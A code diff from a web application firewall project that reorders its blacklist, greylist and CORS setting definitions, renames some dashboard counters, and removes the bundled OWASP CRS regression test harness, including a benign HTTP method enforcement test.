"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_URI": {
"context": "multisite",
"default": "",
@ -104,15 +68,6 @@
"regex": "^( *(.*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_URI_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing bad URI to block.",
"id": "blacklist-uri-urls",
"label": "Blacklist URI URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_IP": {
"context": "multisite",
"default": "",
@ -122,15 +77,6 @@
"regex": "^(?! )( *(((\\b25[0-5]|\\b2[0-4]\\d|\\b[01]?\\d\\d?)(\\.(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)){3})(\\/([1-2][0-9]?|3[0-2]?|[04-9]))?|(([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]Z{0,4}){0,4}%[0-9a-zA-Z]+|::(ffff(:0{1,4})?:)?((25[0-5]|(2[0-4]|1?\\d)?\\d)\\.){3}(25[0-5]|(2[0-4]|1?\\d)?\\d)|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1?\\d)?\\d)\\.){3}(25[0-5]|(2[0-4]|1?\\d)?\\d))(\\/(12[0-8]|1[01][0-9]|[0-9][0-9]?))?)(?!.*\\D\\2([^\\d\\/]|$)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_IP_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing IP/network to ignore in the blacklist.",
"id": "blacklist-ignore-ip-urls",
"label": "Blacklist ignore IP/network URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_RDNS": {
"context": "multisite",
"default": "",
@ -140,15 +86,6 @@
"regex": "^( *(([^ ]+)(?!.*\\3( |$))) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_RDNS_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing reverse DNS suffixes to ignore in the blacklist.",
"id": "blacklist-ignore-rdns-urls",
"label": "Blacklist ignore reverse DNS URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_ASN": {
"context": "multisite",
"default": "",
@ -158,15 +95,6 @@
"regex": "^^( *((ASN?)?(\\d+)\\b(?!.*[SN ]\\4\\b)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_ASN_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing ASN to ignore in the blacklist.",
"id": "blacklist-ignore-asn-urls",
"label": "Blacklist ignore ASN URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_USER_AGENT": {
"context": "multisite",
"default": "",
@ -176,15 +104,6 @@
"regex": "^.*$",
"type": "text"
},
"BLACKLIST_IGNORE_USER_AGENT_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing User-Agent to ignore in the blacklist.",
"id": "blacklist-ignore-user-agent-urls",
"label": "Blacklist ignore User-Agent URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_URI": {
"context": "multisite",
"default": "",
@ -194,6 +113,87 @@
"regex": "^( *(.*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IP_URLS": {
"context": "global",
"default": "https://www.dan.me.uk/torlist/?exit",
"help": "List of URLs, separated with spaces, containing bad IP/network to block.",
"id": "blacklist-ip-urls",
"label": "Blacklist IP/network URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_RDNS_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing reverse DNS suffixes to block.",
"id": "blacklist-rdns-urls",
"label": "Blacklist reverse DNS URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_ASN_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing ASN to block.",
"id": "blacklist-asn-urls",
"label": "Blacklist ASN URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_USER_AGENT_URLS": {
"context": "global",
"default": "https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list",
"help": "List of URLs, separated with spaces, containing bad User-Agent to block.",
"id": "blacklist-user-agent-urls",
"label": "Blacklist User-Agent URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_URI_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing bad URI to block.",
"id": "blacklist-uri-urls",
"label": "Blacklist URI URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_IP_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing IP/network to ignore in the blacklist.",
"id": "blacklist-ignore-ip-urls",
"label": "Blacklist ignore IP/network URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_RDNS_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing reverse DNS suffixes to ignore in the blacklist.",
"id": "blacklist-ignore-rdns-urls",
"label": "Blacklist ignore reverse DNS URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_ASN_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing ASN to ignore in the blacklist.",
"id": "blacklist-ignore-asn-urls",
"label": "Blacklist ignore ASN URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_USER_AGENT_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing User-Agent to ignore in the blacklist.",
"id": "blacklist-ignore-user-agent-urls",
"label": "Blacklist ignore User-Agent URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_URI_URLS": {
"context": "global",
"default": "",

10
src/common/core/blacklist/ui/actions.py
View file

@ -3,11 +3,11 @@ from traceback import format_exc
def pre_render(**kwargs):
metrics = {
"counter_blacklist_url": {"value": "unknown", "title": "URL", "subtitle": "denied", "subtitle_color": "error", "svg_color": "red"},
"counter_blacklist_ip": {"value": "unknown", "title": "IP", "subtitle": "denied", "subtitle_color": "error", "svg_color": "orange"},
"counter_blacklist_rdns": {"value": "unknown", "title": "RDNS", "subtitle": "denied", "subtitle_color": "error", "svg_color": "amber"},
"counter_blacklist_asn": {"value": "unknown", "title": "ASN", "subtitle": "denied", "subtitle_color": "error", "svg_color": "emerald"},
"counter_blacklist_ua": {"value": "unknown", "title": "UA", "subtitle": "denied", "subtitle_color": "error", "svg_color": "pink"},
"counter_failed_url": {"value": "unknown", "title": "URL", "subtitle": "denied", "subtitle_color": "error", "svg_color": "red"},
"counter_failed_ip": {"value": "unknown", "title": "IP", "subtitle": "denied", "subtitle_color": "error", "svg_color": "orange"},
"counter_failed_rdns": {"value": "unknown", "title": "RDNS", "subtitle": "denied", "subtitle_color": "error", "svg_color": "amber"},
"counter_failed_asn": {"value": "unknown", "title": "ASN", "subtitle": "denied", "subtitle_color": "error", "svg_color": "emerald"},
"counter_failed_ua": {"value": "unknown", "title": "UA", "subtitle": "denied", "subtitle_color": "error", "svg_color": "pink"},
}
try:

54
src/common/core/cors/plugin.json
View file

@ -23,6 +23,33 @@
"regex": "^.*$",
"type": "text"
},
"CORS_ALLOW_METHODS": {
"context": "multisite",
"default": "GET, POST, OPTIONS",
"help": "Value of the Access-Control-Allow-Methods header.",
"id": "cors-allow-methods",
"label": "Access-Control-Allow-Methods value",
"regex": "^(\\*|(?![, ])(,? ?(GET|HEAD|POST|PUT|DELETE|CONNECT|OPTIONS|TRACE|PATCH)(?!.*\\3))*)?$",
"type": "text"
},
"CORS_ALLOW_HEADERS": {
"context": "multisite",
"default": "DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range",
"help": "Value of the Access-Control-Allow-Headers header.",
"id": "cors-allow-headers",
"label": "Access-Control-Allow-Headers value",
"regex": "^(\\*|(?![, ])(,? ?([\\w\\-]+)(?!.*\\3(?!.)))*)?$",
"type": "text"
},
"CORS_ALLOW_CREDENTIALS": {
"context": "multisite",
"default": "no",
"help": "Send the Access-Control-Allow-Credentials header.",
"id": "cors-allow-credentials",
"label": "Send Access-Control-Allow-Credentials",
"regex": "^(yes|no)$",
"type": "check"
},
"CORS_EXPOSE_HEADERS": {
"context": "multisite",
"default": "Content-Length,Content-Range",
@ -71,33 +98,6 @@
"regex": "^\\d+$",
"type": "text"
},
"CORS_ALLOW_CREDENTIALS": {
"context": "multisite",
"default": "no",
"help": "Send the Access-Control-Allow-Credentials header.",
"id": "cors-allow-credentials",
"label": "Send Access-Control-Allow-Credentials",
"regex": "^(yes|no)$",
"type": "check"
},
"CORS_ALLOW_METHODS": {
"context": "multisite",
"default": "GET, POST, OPTIONS",
"help": "Value of the Access-Control-Allow-Methods header.",
"id": "cors-allow-methods",
"label": "Access-Control-Allow-Methods value",
"regex": "^(\\*|(?![, ])(,? ?(GET|HEAD|POST|PUT|DELETE|CONNECT|OPTIONS|TRACE|PATCH)(?!.*\\3))*)?$",
"type": "text"
},
"CORS_ALLOW_HEADERS": {
"context": "multisite",
"default": "DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range",
"help": "Value of the Access-Control-Allow-Headers header.",
"id": "cors-allow-headers",
"label": "Access-Control-Allow-Headers value",
"regex": "^(\\*|(?![, ])(,? ?([\\w\\-]+)(?!.*\\3(?!.)))*)?$",
"type": "text"
},
"CORS_DENY_REQUEST": {
"context": "multisite",
"default": "yes",

84
src/common/core/greylist/plugin.json
View file

@ -23,13 +23,13 @@
"regex": "^(?! )( *(((\\b25[0-5]|\\b2[0-4]\\d|\\b[01]?\\d\\d?)(\\.(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)){3})(\\/([1-2][0-9]?|3[0-2]?|[04-9]))?|(([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]Z{0,4}){0,4}%[0-9a-zA-Z]+|::(ffff(:0{1,4})?:)?((25[0-5]|(2[0-4]|1?\\d)?\\d)\\.){3}(25[0-5]|(2[0-4]|1?\\d)?\\d)|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1?\\d)?\\d)\\.){3}(25[0-5]|(2[0-4]|1?\\d)?\\d))(\\/(12[0-8]|1[01][0-9]|[0-9][0-9]?))?)(?!.*\\D\\2([^\\d\\/]|$)) *)*$",
"type": "text"
},
"GREYLIST_IP_URLS": {
"context": "global",
"GREYLIST_RDNS": {
"context": "multisite",
"default": "",
"help": "List of URLs, separated with spaces, containing good IP/network to put into the greylist.",
"id": "greylist-ip-urls",
"label": "Greylist IP/network URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"help": "List of reverse DNS suffixes, separated with spaces, to put into the greylist.",
"id": "greylist-rdns",
"label": "Greylist reverse DNS",
"regex": "^( *(([^ ]+)(?!.*\\3( |$))) *)*$",
"type": "text"
},
"GREYLIST_RDNS_GLOBAL": {
@ -41,24 +41,6 @@
"regex": "^(yes|no)$",
"type": "check"
},
"GREYLIST_RDNS": {
"context": "multisite",
"default": "",
"help": "List of reverse DNS suffixes, separated with spaces, to put into the greylist.",
"id": "greylist-rdns",
"label": "Greylist reverse DNS",
"regex": "^( *(([^ ]+)(?!.*\\3( |$))) *)*$",
"type": "text"
},
"GREYLIST_RDNS_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing reverse DNS suffixes to put into the greylist.",
"id": "greylist-rdns-urls",
"label": "Greylist reverse DNS URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"GREYLIST_ASN": {
"context": "multisite",
"default": "",
@ -68,15 +50,6 @@
"regex": "^^( *((ASN?)?(\\d+)\\b(?!.*[SN ]\\4\\b)) *)*$",
"type": "text"
},
"GREYLIST_ASN_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing ASN to put into the greylist.",
"id": "greylist-asn-urls",
"label": "Greylist ASN URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"GREYLIST_USER_AGENT": {
"context": "multisite",
"default": "",
@ -86,15 +59,6 @@
"regex": "^.*$",
"type": "text"
},
"GREYLIST_USER_AGENT_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing good User-Agent to put into the greylist.",
"id": "greylist-user-agent-urls",
"label": "Greylist User-Agent URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"GREYLIST_URI": {
"context": "multisite",
"default": "",
@ -104,6 +68,42 @@
"regex": "^.*$",
"type": "text"
},
"GREYLIST_IP_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing good IP/network to put into the greylist.",
"id": "greylist-ip-urls",
"label": "Greylist IP/network URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"GREYLIST_RDNS_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing reverse DNS suffixes to put into the greylist.",
"id": "greylist-rdns-urls",
"label": "Greylist reverse DNS URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"GREYLIST_ASN_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing ASN to put into the greylist.",
"id": "greylist-asn-urls",
"label": "Greylist ASN URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"GREYLIST_USER_AGENT_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing good User-Agent to put into the greylist.",
"id": "greylist-user-agent-urls",
"label": "Greylist User-Agent URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"GREYLIST_URI_URLS": {
"context": "global",
"default": "",

72
src/common/core/modsecurity/files/coreruleset-v3/tests/docker-compose.yml vendored
View file

@ -1,72 +0,0 @@
version: '3.2'
# Only one of these will be up at a time for now.
# Concurrency will be on the tests folder we have.
services:
modsec2-apache:
container_name: modsec2-apache
image: owasp/modsecurity-crs:apache
environment:
SERVERNAME: modsec2-apache
BACKEND: http://backend
PORT: "80"
MODSEC_RULE_ENGINE: DetectionOnly
PARANOIA: 4
TZ: "${TZ}"
ERRORLOG: "/var/log/error.log"
ACCESSLOG: "/var/log/access.log"
MODSEC_AUDIT_LOG_FORMAT: Native
MODSEC_AUDIT_LOG_TYPE: Serial
MODSEC_AUDIT_LOG: "/var/log/modsec_audit.log"
MODSEC_TMP_DIR: "/tmp"
MODSEC_RESP_BODY_ACCESS: "On"
MODSEC_RESP_BODY_MIMETYPE: "text/plain text/html text/xml application/json"
COMBINED_FILE_SIZES: "65535"
CRS_ENABLE_TEST_MARKER: 1
volumes:
- ./logs/modsec2-apache:/var/log:rw
- ../rules:/opt/owasp-crs/rules:ro
- ../crs-setup.conf.example:/etc/modsecurity.d/owasp-crs/crs-setup.conf.example
entrypoint: ["/bin/sh", "-c", "/bin/cp /etc/modsecurity.d/owasp-crs/crs-setup.conf.example /etc/modsecurity.d/owasp-crs/crs-setup.conf && /docker-entrypoint.sh && apachectl -D FOREGROUND"]
ports:
- "80:80"
depends_on:
- backend
modsec3-nginx:
container_name: modsec3-nginx
image: owasp/modsecurity-crs:nginx
environment:
SERVERNAME: modsec3-nginx
BACKEND: http://backend
PORT: "80"
MODSEC_RULE_ENGINE: DetectionOnly
PARANOIA: 4
TZ: "${TZ}"
ERRORLOG: "/var/log/error.log"
LOGLEVEL: "info"
ACCESSLOG: "/var/log/access.log"
MODSEC_AUDIT_LOG_FORMAT: Native
MODSEC_AUDIT_LOG_TYPE: Serial
MODSEC_AUDIT_LOG: "/var/log/modsec_audit.log"
MODSEC_RESP_BODY_ACCESS: "On"
MODSEC_RESP_BODY_MIMETYPE: "text/plain text/html text/xml application/json"
COMBINED_FILE_SIZES: "65535"
CRS_ENABLE_TEST_MARKER: 1
volumes:
- ./logs/modsec3-nginx:/var/log:rw
- ../rules:/opt/owasp-crs/rules:ro
- ../crs-setup.conf.example:/etc/modsecurity.d/owasp-crs/crs-setup.conf.example
command: ["nginx", "-g", "daemon off;"]
ports:
- "80:80"
depends_on:
- backend
# our test originally targeted www.example.com as backend
# and that would do real traffic, to a real site
#
backend:
image: docker.io/kennethreitz/httpbin

1
src/common/core/modsecurity/files/coreruleset-v3/tests/integration/requirements.txt vendored
View file

@ -1 +0,0 @@
pytest>=2.9.1

149
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/CRS_Tests.py vendored
View file

@ -1,149 +0,0 @@
from subprocess import TimeoutExpired
from ftw import logchecker, testrunner, http
from ftw.ruleset import Input
import pytest
import os
CRS_HEADER = 'X-CRS-Test'
def test_crs(test, logchecker_obj):
runner = testrunner.TestRunner()
for stage in test.stages:
runner.run_stage(stage, logchecker_obj)
class FooLogChecker(logchecker.LogChecker):
def __init__(self, config):
super(FooLogChecker, self).__init__()
self.log_location = self.find_log_location(config)
self.backwards_reader = BackwardsReader(self.log_location)
self.start_marker = None
self.end_marker = None
def mark_start(self, stage_id):
self.start_marker = self.find_marker(stage_id)
def mark_end(self, stage_id):
self.end_marker = self.find_marker(stage_id)
def find_marker(self, stage_id):
stage_id_bytes = stage_id.encode('utf-8')
header_bytes = CRS_HEADER.encode('utf-8')
def try_once():
self.mark_and_flush_log(stage_id)
self.backwards_reader.reset()
return self.backwards_reader.readline() or b''
line = try_once()
while not (header_bytes in line and stage_id_bytes in line):
line = try_once()
return line
def get_logs(self):
logs = []
# At this point we're already at the end marker
for line in self.backwards_reader.readlines():
if line == self.start_marker:
break
logs.append(line.decode('utf-8'))
return logs
def mark_and_flush_log(self, header_value):
"""
Send a valid request to the server with a special header that will
generate an entry in the log. We can use this to flush the log and to
mark the output so we know where our test output is.
"""
http.HttpUA().send_request(Input(
headers={
'Host': 'localhost',
'User-Agent': 'CRS',
'Accept': '*/*',
CRS_HEADER: header_value
},
version='HTTP/1.0'))
@staticmethod
def find_log_location(config):
key = 'log_location_linux'
# First, try to find the log configuration from config.ini
if key in config:
return config[key]
else:
# Now we could check for the configuration that was passed
# on the command line. Unfortunately, we use a default, so we
# don't know whether it was *actually* on the command line.
# Let's try to find the Docker container instead.
import os.path
import subprocess
prefix = os.path.join('tests', 'logs')
log_file_name = 'error.log'
directory_name = 'modsec2-apache'
process = subprocess.Popen(
'docker ps --format "{{.Names}}"',
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
out, _ = process.communicate(timeout=10)
except TimeoutExpired:
out = ''
if b'modsec3-nginx' in out:
directory_name = 'modsec3-nginx'
return os.path.join(prefix, directory_name, log_file_name)
@pytest.fixture(scope='session')
def logchecker_obj(config):
return FooLogChecker(config)
# Adapted from http://code.activestate.com/recipes/120686-read-a-text-file-backwards/
class BackwardsReader:
def __init__(self, file, blksize=4096):
"""initialize the internal structures"""
self.file = file
# how big of a block to read from the file...
self.blksize = blksize
self.f = open(file, 'rb')
self.reset()
def readline(self):
while len(self.data) == 1 and ((self.blkcount * self.blksize) < self.size):
self.blkcount = self.blkcount + 1
line = self.data[0]
try:
self.f.seek(-self.blksize * self.blkcount, os.SEEK_END) # read from end of file
self.data = (self.f.read(self.blksize) + line).split(b'\n')
except IOError: # can't seek before the beginning of the file
self.f.seek(0)
self.data = (self.f.read(self.size - (self.blksize * (self.blkcount-1))) + line).split(b'\n')
if len(self.data) == 0:
return ""
line = self.data.pop()
return line + b'\n'
def readlines(self):
line = self.readline()
while line:
yield line
line = self.readline()
def reset(self):
# get the file size
self.size = os.stat(self.file)[6]
# how many blocks we've read
self.blkcount = 1
# if the file is smaller than the blocksize, read a block,
# otherwise, read the whole thing...
if self.size > self.blksize:
self.f.seek(-self.blksize * self.blkcount, 2) # read from end of file
self.data = self.f.read(self.blksize).split(b'\n')
# strip the last item if it's empty... a byproduct of the last line having
# a newline at the end of it
if not self.data[-1]:
self.data.pop()

63
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/README.md vendored
View file

@ -1,63 +0,0 @@
owasp-crs-regressions
=====================
Introduction
============
Welcome to the OWASP Core Rule Set regression testing suite. This suite is meant to test specific rules in OWASP CRS version 3. The suite is designed to uses preconfigured IDs that are specific to this version of CRS. The tests themselves can be run without CRS and one would expect the same elements to be blocked, however one must override the default Output parameter in the tests.
Installation
============
The OWASP Core Rule Set project was part of the effort to develop FTW, the Framework for Testing WAFs. As a result, we use this project in order to run our regression testing. FTW is designed to use existing Python testing frameworks to allow for easy to read web based testing, provided in YAML. You can install FTW by from the repository (at https://github.com/CRS-support/ftw) or by running pip.
```pip install -r requirements.txt```
This will install FTW as a library. It can also be run natively, see the FTW documentation for more detail.
Requirements
============
There are Three requirements for running the OWASP CRS regressions.
1. You must have ModSecurity specify the location of your error.log, this is done in the config.py file
2. ModSecurity must be in DetectionOnly (or anomaly scoring) mode
3. You must disable IP blocking based on previous events
Note: The test suite compares timezones -- if your test machine and your host machine are in different timezones this can cause bad results
To accomplish 2. and 3. you may use the following rule in your setup.conf:
```
SecAction "id:900005,\
phase:1,\
nolog,\
pass,\
ctl:ruleEngine=DetectionOnly,\
ctl:ruleRemoveById=910000,\
setvar:tx.paranoia_level=4,\
setvar:tx.crs_validate_utf8_encoding=1,\
setvar:tx.arg_name_length=100,\
setvar:tx.arg_length=400"
```
Once these requirements have been met the tests can be run by using pytest.
Running The Tests
=================
On Windows this will look like:
-------------------------------
Single Rule File:
```py.test.exe -v CRS_Tests.py --rule=tests/test.yaml```
The Whole Suite:
```py.test.exe -v CRS_Tests.py --ruledir_recurse=tests/```
On Linux this will look like:
-----------------------------
Single Rule File:
```py.test -v CRS_Tests.py --rule=tests/test.yaml```
The Whole Suite:
```py.test -v CRS_Tests.py --ruledir_recurse=tests/```
Contributions
=============
We'd like to thank Fastly for their help and support in developing these tests.

0
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/__init__.py vendored
View file

5
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/config.ini vendored
View file

@ -1,5 +0,0 @@
[modsec2-apache]
log_location_linux = tests/logs/modsec2-apache/error.log
[modsec3-nginx]
log_location_linux = tests/logs/modsec3-nginx/error.log

17
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/conftest.py vendored
View file

@ -1,17 +0,0 @@
try:
import ConfigParser as configparser
except ImportError:
import configparser
import os
import pytest
def pytest_addoption(parser):
parser.addoption('--config', action='store', default='modsec2-apache')
@pytest.fixture(scope='session')
def config(request):
cp = configparser.RawConfigParser()
cp.read(os.path.join(os.path.dirname(__file__), 'config.ini'))
return dict(cp.items(request.config.getoption('--config')))

1
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/requirements.txt vendored
View file

@ -1 +0,0 @@
ftw==1.3.0

131
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml vendored
View file

@ -1,131 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "911100.yaml"
description: "Description"
tests:
- test_title: 911100-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
- test_title: 911100-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
- test_title: 911100-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "HEAD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
- test_title: 911100-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "test=value"
output:
no_log_contains: "id \"911100\""
- test_title: 911100-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "TEST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"911100\""
- test_title: 911100-6
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: DELETE
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"
- test_title: 911100-7
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
